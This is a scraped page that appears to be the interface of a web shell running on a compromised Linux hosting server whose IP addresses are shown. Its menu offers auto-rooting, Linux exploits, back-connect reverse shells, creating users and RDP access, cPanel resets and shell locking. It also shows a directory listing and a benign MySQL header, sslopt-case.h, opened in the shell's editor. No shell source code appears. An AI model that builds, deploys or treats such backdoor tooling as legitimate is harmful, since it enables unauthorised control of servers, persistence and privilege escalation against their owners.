Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.145.103.169
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
include /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
mysql
[ DIR ]
drwxr-xr-x
big_endian.h
3.96
KB
-rw-r--r--
binary_log_types.h
2.59
KB
-rw-r--r--
byte_order_generic.h
2.89
KB
-rw-r--r--
byte_order_generic_x86.h
2.81
KB
-rw-r--r--
decimal.h
5.45
KB
-rw-r--r--
errmsg.h
4.73
KB
-rw-r--r--
keycache.h
7.71
KB
-rw-r--r--
little_endian.h
3.82
KB
-rw-r--r--
m_ctype.h
33.87
KB
-rw-r--r--
m_string.h
10.89
KB
-rw-r--r--
my_alloc.h
2.92
KB
-rw-r--r--
my_byteorder.h
6.03
KB
-rw-r--r--
my_command.h
2.27
KB
-rw-r--r--
my_compiler.h
5.68
KB
-rw-r--r--
my_config.h
919
B
-rw-r--r--
my_config_x86_64.h
12.17
KB
-rw-r--r--
my_dbug.h
9.75
KB
-rw-r--r--
my_dir.h
3.33
KB
-rw-r--r--
my_getopt.h
6.7
KB
-rw-r--r--
my_global.h
22.75
KB
-rw-r--r--
my_list.h
2.14
KB
-rw-r--r--
my_sys.h
39.14
KB
-rw-r--r--
my_thread.h
5.16
KB
-rw-r--r--
my_thread_local.h
2.9
KB
-rw-r--r--
my_xml.h
3.15
KB
-rw-r--r--
mysql.h
29.19
KB
-rw-r--r--
mysql_com.h
24.99
KB
-rw-r--r--
mysql_com_server.h
1.85
KB
-rw-r--r--
mysql_embed.h
1.51
KB
-rw-r--r--
mysql_time.h
2.77
KB
-rw-r--r--
mysql_version.h
1023
B
-rw-r--r--
mysqld_ername.h
122.67
KB
-rw-r--r--
mysqld_error.h
44.6
KB
-rw-r--r--
mysqlx_ername.h
3.63
KB
-rw-r--r--
mysqlx_error.h
3.11
KB
-rw-r--r--
mysqlx_version.h
1.77
KB
-rw-r--r--
plugin.h
26.08
KB
-rw-r--r--
plugin_audit.h
17.52
KB
-rw-r--r--
plugin_ftparser.h
7.86
KB
-rw-r--r--
plugin_group_replication.h
5.93
KB
-rw-r--r--
plugin_keyring.h
6.54
KB
-rw-r--r--
plugin_validate_password.h
1.94
KB
-rw-r--r--
sql_common.h
8
KB
-rw-r--r--
sql_state.h
14.72
KB
-rw-r--r--
sslopt-case.h
2.43
KB
-rw-r--r--
sslopt-longopts.h
3.13
KB
-rw-r--r--
sslopt-vars.h
3.23
KB
-rw-r--r--
thr_cond.h
5.42
KB
-rw-r--r--
thr_mutex.h
5.92
KB
-rw-r--r--
thr_rwlock.h
6.28
KB
-rw-r--r--
typelib.h
2.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sslopt-case.h
/* Copyright (c) 2000, 2023, Oracle and/or its affiliates. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License, version 2.0, as published by the Free Software Foundation. This program is also distributed with certain software (including but not limited to OpenSSL) that is licensed under separate terms, as designated in a particular file or component or in included license documentation. The authors of MySQL hereby grant you an additional permission to link the program and your derivative works with the separately licensed software that they have included with MySQL. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License, version 2.0, for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #if defined(HAVE_OPENSSL) && !defined(EMBEDDED_LIBRARY) #ifndef MYSQL_CLIENT #error This header is supposed to be used only in the client #endif case OPT_SSL_MODE: opt_ssl_mode= find_type_or_exit(argument, &ssl_mode_typelib, opt->name); ssl_mode_set_explicitly= TRUE; break; case OPT_SSL_SSL: CLIENT_WARN_DEPRECATED("--ssl", "--ssl-mode"); if (!opt_use_ssl_arg) opt_ssl_mode= SSL_MODE_DISABLED; else if (opt_ssl_mode < SSL_MODE_REQUIRED) opt_ssl_mode= SSL_MODE_REQUIRED; break; case OPT_SSL_VERIFY_SERVER_CERT: CLIENT_WARN_DEPRECATED("--ssl-verify-server-cert", "--ssl-mode=VERIFY_IDENTITY"); if (!opt_ssl_verify_server_cert_arg) { if (opt_ssl_mode >= SSL_MODE_VERIFY_IDENTITY) opt_ssl_mode= SSL_MODE_VERIFY_CA; } else opt_ssl_mode= SSL_MODE_VERIFY_IDENTITY; break; case OPT_SSL_CA: case OPT_SSL_CAPATH: /* Don't change ssl-mode if set explicitly. */ if (!ssl_mode_set_explicitly) opt_ssl_mode= SSL_MODE_VERIFY_CA; break; case OPT_SSL_KEY: case OPT_SSL_CERT: case OPT_SSL_CIPHER: case OPT_SSL_CRL: case OPT_SSL_CRLPATH: case OPT_TLS_VERSION: break; #endif /* HAVE_OPENSSL */
Close